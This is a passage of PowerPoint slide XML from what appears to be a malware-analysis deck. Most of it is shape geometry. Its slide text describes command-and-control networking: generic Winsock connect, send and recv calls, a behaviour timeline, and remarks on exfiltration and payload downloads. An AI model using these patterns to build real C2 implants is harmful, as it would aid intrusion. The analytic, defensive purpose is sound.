                  <a:pt x="84784" y="127177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84784" y="122790"/>
                  <a:pt x="88346" y="119228"/>
                  <a:pt x="92733" y="119228"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="111280" y="127177"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="111280" y="122790"/>
                  <a:pt x="114841" y="119228"/>
                  <a:pt x="119228" y="119228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123615" y="119228"/>
                  <a:pt x="127177" y="122790"/>
                  <a:pt x="127177" y="127177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127177" y="131564"/>
                  <a:pt x="123615" y="135125"/>
                  <a:pt x="119228" y="135125"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114841" y="135125"/>
                  <a:pt x="111280" y="131564"/>
                  <a:pt x="111280" y="127177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7" name="Text 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8717005" y="1644818"/>
            <a:ext cx="1576990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Connect Operations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276126" y="2034826"/>
            <a:ext cx="3442248" cy="915672"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3442248" h="915672">
                <a:moveTo>
                  <a:pt x="33916" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3408331" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3427063" y="0"/>
                  <a:pt x="3442248" y="15185"/>
                  <a:pt x="3442248" y="33916"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3442248" y="881755"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3442248" y="900487"/>
                  <a:pt x="3427063" y="915672"/>
                  <a:pt x="3408331" y="915672"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33916" y="915672"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15185" y="915672"/>
                  <a:pt x="0" y="900487"/>
                  <a:pt x="0" y="881755"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33916"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15185"/>
                  <a:pt x="15185" y="0"/>
                  <a:pt x="33916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9" name="Text 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8377867" y="2136567"/>
            <a:ext cx="3298114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C2 Server Connection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377867" y="2340050"/>
            <a:ext cx="3298114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connect(hSocket,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377867" y="2509619"/>
            <a:ext cx="3298114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(SOCKADDR*)&amp;addr,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377867" y="2679188"/>
            <a:ext cx="3298114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sizeof(addr));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276126" y="3052239"/>
            <a:ext cx="3510075" cy="6104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Establishes outbound connections to command-and-control servers, confirming malicious intent for remote control.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8276126" y="3767820"/>
            <a:ext cx="3442248" cy="6783"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3442248" h="6783">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3442248" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3442248" y="6783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="4A4F59">
              <a:alpha val="4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5" name="Text 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8276126" y="3872951"/>
            <a:ext cx="350159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Level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8276126" y="4076433"/>
            <a:ext cx="3518554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2" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FB2C3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356095" y="4551226"/>
            <a:ext cx="5672078" cy="2814843"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5672078" h="2814843">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5672078" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5672078" y="2814843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2814843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8" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="356095" y="4551226"/>
            <a:ext cx="33914" cy="2814843"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33914" h="2814843">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33914" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33914" y="2814843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2814843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9" name="Shape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508707" y="4686881"/>
            <a:ext cx="339138" cy="339138"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="339138" h="339138">
                <a:moveTo>
                  <a:pt x="33914" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="305224" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="323954" y="0"/>
                  <a:pt x="339138" y="15184"/>
                  <a:pt x="339138" y="33914"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="339138" y="305224"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="339138" y="323954"/>
                  <a:pt x="323954" y="339138"/>
                  <a:pt x="305224" y="339138"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33914" y="339138"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15184" y="339138"/>
                  <a:pt x="0" y="323954"/>
                  <a:pt x="0" y="305224"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33914"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15196"/>
                  <a:pt x="15196" y="0"/>
                  <a:pt x="33914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0" name="Shape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="593491" y="4771666"/>
            <a:ext cx="169569" cy="169569"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="169569" h="169569">
                <a:moveTo>
                  <a:pt x="166456" y="49877"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134662" y="81671"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="131615" y="84718"/>
                  <a:pt x="127077" y="85612"/>
                  <a:pt x="123103" y="83956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119129" y="82301"/>
                  <a:pt x="116579" y="78459"/>
                  <a:pt x="116579" y="74186"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="116579" y="52990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10598" y="52990"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4736" y="52990"/>
                  <a:pt x="0" y="48254"/>
                  <a:pt x="0" y="42392"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="36530"/>
                  <a:pt x="4736" y="31794"/>
                  <a:pt x="10598" y="31794"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="116579" y="31794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116579" y="10598"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="116579" y="6326"/>
                  <a:pt x="119162" y="2451"/>
                  <a:pt x="123136" y="795"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127110" y="-861"/>
                  <a:pt x="131648" y="66"/>
                  <a:pt x="134695" y="3080"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="166489" y="34874"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="170629" y="39014"/>
                  <a:pt x="170629" y="45737"/>
                  <a:pt x="166489" y="49877"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="34874" y="166456"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3080" y="134662"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="-1060" y="130522"/>
                  <a:pt x="-1060" y="123799"/>
                  <a:pt x="3080" y="119659"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34874" y="87864"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="37921" y="84818"/>
                  <a:pt x="42458" y="83923"/>
                  <a:pt x="46433" y="85579"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50407" y="87235"/>
                  <a:pt x="52990" y="91110"/>
                  <a:pt x="52990" y="95382"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="52990" y="116579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158971" y="116579"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="164833" y="116579"/>
                  <a:pt x="169569" y="121315"/>
                  <a:pt x="169569" y="127177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169569" y="133039"/>
                  <a:pt x="164833" y="137775"/>
                  <a:pt x="158971" y="137775"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="52990" y="137775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52990" y="158971"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="52990" y="163243"/>
                  <a:pt x="50407" y="167118"/>
                  <a:pt x="46433" y="168774"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42458" y="170430"/>
                  <a:pt x="37921" y="169503"/>
                  <a:pt x="34874" y="166489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1" name="Text 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949586" y="4737752"/>
            <a:ext cx="1983955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Send/Receive Operations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08707" y="5127760"/>
            <a:ext cx="5383811" cy="1085241"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5383811" h="1085241">
                <a:moveTo>
                  <a:pt x="33914" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5349897" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5368627" y="0"/>
                  <a:pt x="5383811" y="15184"/>
                  <a:pt x="5383811" y="33914"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5383811" y="1051327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5383811" y="1070057"/>
                  <a:pt x="5368627" y="1085241"/>
                  <a:pt x="5349897" y="1085241"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33914" y="1085241"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15184" y="1085241"/>
                  <a:pt x="0" y="1070057"/>
                  <a:pt x="0" y="1051327"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33914"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15184"/>
                  <a:pt x="15184" y="0"/>
                  <a:pt x="33914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3" name="Text 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610448" y="5229502"/>
            <a:ext cx="523967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Data Exchange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10448" y="5432984"/>
            <a:ext cx="523967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send(hSocket, lpBuffer,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10448" y="5602553"/>
            <a:ext cx="523967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dwLen, 0);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10448" y="5772122"/>
            <a:ext cx="523967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recv(hSocket, lpBuffer,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10448" y="5941691"/>
            <a:ext cx="5239677" cy="169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5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dwLen, 0);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508707" y="6314742"/>
            <a:ext cx="5451638" cy="4069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68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Bidirectional data transfer enables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1068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command execution, data exfiltration, and payload downloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1068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6168067" y="4554618"/>
            <a:ext cx="5687339" cy="2813147"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5687339" h="2813147">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5687339" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5687339" y="2813147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2813147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10196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="10160">
            <a:solidFill>
              <a:srgbClr val="E0A45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60" name="Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6328310" y="4727580"/>
            <a:ext cx="169569" cy="169569"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="169569" h="169569">
                <a:moveTo>
                  <a:pt x="21196" y="21196"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21196" y="15334"/>
                  <a:pt x="16460" y="10598"/>
                  <a:pt x="10598" y="10598"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4736" y="10598"/>
                  <a:pt x="0" y="15334"/>
                  <a:pt x="0" y="21196"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="132476"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="147114"/>
                  <a:pt x="11857" y="158971"/>
                  <a:pt x="26495" y="158971"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="158971" y="158971"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="164833" y="158971"/>
                  <a:pt x="169569" y="154235"/>
                  <a:pt x="169569" y="148373"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169569" y="142511"/>
                  <a:pt x="164833" y="137775"/>
                  <a:pt x="158971" y="137775"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="26495" y="137775"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="23581" y="137775"/>
                  <a:pt x="21196" y="135390"/>
                  <a:pt x="21196" y="132476"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21196" y="21196"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="155858" y="49877"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="159997" y="45737"/>
                  <a:pt x="159997" y="39014"/>
                  <a:pt x="155858" y="34874"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="151718" y="30734"/>
                  <a:pt x="144995" y="30734"/>
                  <a:pt x="140855" y="34874"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="105981" y="69782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86970" y="50804"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="82830" y="46665"/>
                  <a:pt x="76107" y="46665"/>
                  <a:pt x="71967" y="50804"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="40173" y="82599"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="36033" y="86738"/>
                  <a:pt x="36033" y="93462"/>
                  <a:pt x="40173" y="97601"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44313" y="101741"/>
                  <a:pt x="51036" y="101741"/>
                  <a:pt x="55176" y="97601"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="79485" y="73292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98496" y="92302"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="102636" y="96442"/>
                  <a:pt x="109359" y="96442"/>
                  <a:pt x="113499" y="92302"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="155891" y="4991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1" name="Text 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6519074" y="4693666"/>
            <a:ext cx="5282070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3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Network Behavior Timeline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604389" y="5586445"/>
            <a:ext cx="542620" cy="542620"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="542620" h="542620">
                <a:moveTo>
                  <a:pt x="271310" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="271310" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="421151" y="0"/>
                  <a:pt x="542620" y="121470"/>
                  <a:pt x="542620" y="271310"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="542620" y="271310"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="542620" y="421151"/>
                  <a:pt x="421151" y="542620"/>
                  <a:pt x="271310" y="542620"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="271310" y="542620"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="121470" y="542620"/>
                  <a:pt x="0" y="421151"/>
                  <a:pt x="0" y="271310"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="271310"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="121470"/>
                  <a:pt x="121470" y="0"/>
                  <a:pt x="271310" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F0B100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3" name="Shape 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786675" y="5756014"/>
            <a:ext cx="178047" cy="203483"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="178047" h="203483">
                <a:moveTo>
                  <a:pt x="36245" y="14665"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="31317" y="11963"/>
                  <a:pt x="25356" y="12082"/>
                  <a:pt x="20507" y="14943"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15659" y="17805"/>
                  <a:pt x="12718" y="23011"/>
                  <a:pt x="12718" y="28615"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12718" y="174868"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12718" y="180472"/>
                  <a:pt x="15698" y="185678"/>
                  <a:pt x="20507" y="188539"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25316" y="191401"/>
                  <a:pt x="31317" y="191520"/>
                  <a:pt x="36245" y="188818"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="169781" y="115691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="174868" y="112909"/>
                  <a:pt x="178047" y="107544"/>
                  <a:pt x="178047" y="101741"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="178047" y="95939"/>
                  <a:pt x="174868" y="90574"/>
                  <a:pt x="169781" y="87792"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36245" y="14665"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FDC70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4" name="Text 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419029" y="6196893"/>
            <a:ext cx="915672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8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T+0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6414790" y="6434289"/>
            <a:ext cx="924150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WSAStartup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7590114" y="5993410"/>
            <a:ext cx="305224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2" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0A45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8098078" y="5586445"/>
            <a:ext cx="542620" cy="542620"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="542620" h="542620">
                <a:moveTo>
                  <a:pt x="271310" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="271310" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="421151" y="0"/>
                  <a:pt x="542620" y="121470"/>
                  <a:pt x="542620" y="271310"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="542620" y="271310"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="542620" y="421151"/>
                  <a:pt x="421151" y="542620"/>
                  <a:pt x="271310" y="542620"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="271310" y="542620"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="121470" y="542620"/>
                  <a:pt x="0" y="421151"/>
                  <a:pt x="0" y="271310"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="271310"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="121470"/>
                  <a:pt x="121470" y="0"/>
                  <a:pt x="271310" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF6900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8" name="Shape 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8280365" y="5756014"/>
            <a:ext cx="178047" cy="203483"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="178047" h="203483">
                <a:moveTo>
                  <a:pt x="50871" y="-12718"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="57905" y="-12718"/>
                  <a:pt x="63588" y="-7034"/>
                  <a:pt x="63588" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63588" y="38153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114459" y="38153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114459" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="114459" y="-7034"/>
                  <a:pt x="120142" y="-12718"/>
                  <a:pt x="127177" y="-12718"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="134211" y="-12718"/>
                  <a:pt x="139894" y="-7034"/>
                  <a:pt x="139894" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="139894" y="38153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165330" y="38153"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="172364" y="38153"/>
                  <a:pt x="178047" y="43836"/>
                  <a:pt x="178047" y="50871"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="178047" y="57905"/>
                  <a:pt x="172364" y="63588"/>
                  <a:pt x="165330" y="63588"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="165330" y="89024"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="165330" y="126819"/>
                  <a:pt x="137828" y="158216"/>
                  <a:pt x="101741" y="164257"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="101741" y="190765"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="101741" y="197799"/>
                  <a:pt x="96058" y="203483"/>
                  <a:pt x="89024" y="203483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="81989" y="203483"/>
                  <a:pt x="76306" y="197799"/>
                  <a:pt x="76306" y="190765"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76306" y="164257"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="40220" y="158216"/>
                  <a:pt x="12718" y="126819"/>
                  <a:pt x="12718" y="89024"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12718" y="63588"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5683" y="63588"/>
                  <a:pt x="0" y="57905"/>
                  <a:pt x="0" y="50871"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="43836"/>
                  <a:pt x="5683" y="38153"/>
                  <a:pt x="12718" y="38153"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38153" y="38153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38153" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="38153" y="-7034"/>
                  <a:pt x="43836" y="-12718"/>
                  <a:pt x="50871" y="-12718"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF890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9" name="Text 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051341" y="6196893"/>
            <a:ext cx="635883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8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T+1s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047102" y="6434289"/>
            <a:ext cx="644362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socket()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8945287" y="5993410"/>
            <a:ext cx="305224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2" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0A45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9501472" y="5586445"/>
            <a:ext cx="542620" cy="542620"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="542620" h="542620">
                <a:moveTo>
                  <a:pt x="271310" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="271310" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="421151" y="0"/>
                  <a:pt x="542620" y="121470"/>
                  <a:pt x="542620" y="271310"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="542620" y="271310"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="542620" y="421151"/>
                  <a:pt x="421151" y="542620"/>
                  <a:pt x="271310" y="542620"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="271310" y="542620"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="121470" y="542620"/>
                  <a:pt x="0" y="421151"/>
                  <a:pt x="0" y="271310"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="271310"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="121470"/>
                  <a:pt x="121470" y="0"/>
                  <a:pt x="271310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3" name="Shape 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9658323" y="5756014"/>
            <a:ext cx="228918" cy="203483"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="228918" h="203483">
                <a:moveTo>
                  <a:pt x="166721" y="38153"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="160123" y="38153"/>
                  <a:pt x="153725" y="39941"/>
                  <a:pt x="148121" y="43200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="141842" y="36841"/>
                  <a:pt x="134529" y="31516"/>
                  <a:pt x="126461" y="27502"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="137669" y="17964"/>
                  <a:pt x="151936" y="12718"/>
                  <a:pt x="166721" y="12718"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="201058" y="12718"/>
                  <a:pt x="228918" y="40538"/>
                  <a:pt x="228918" y="74915"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228918" y="91408"/>
                  <a:pt x="222360" y="107226"/>
                  <a:pt x="210716" y="118870"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="182459" y="147127"/>
                </a:lnTo>
                <a:cubicBezTo>
